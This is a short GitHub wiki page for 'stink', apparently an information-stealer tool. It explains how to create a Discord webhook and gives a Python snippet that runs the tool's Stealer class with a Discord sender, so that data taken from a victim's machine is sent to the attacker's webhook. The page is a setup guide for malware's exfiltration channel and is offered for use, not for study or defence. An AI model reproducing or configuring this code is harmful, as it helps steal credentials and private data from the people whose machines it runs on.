Discord hook - FallenAstaroth/stink GitHub Wiki

Introduction

A guide on how to set up data sending via the Discord hook.

Getting webhook

  1. Open the server in which the data should be sent.
  2. Open the server settings by clicking its name:

image

  1. Select Integration in the menu that appears.

image

  1. Click the Create Webhook button:

image

  1. Copy your webhook:

image

Example usage

from stink import Stealer, Senders

if __name__ == '__main__':
    Stealer(senders=[Senders.discord(webhook="YOUR_WEBHOOK")]).run()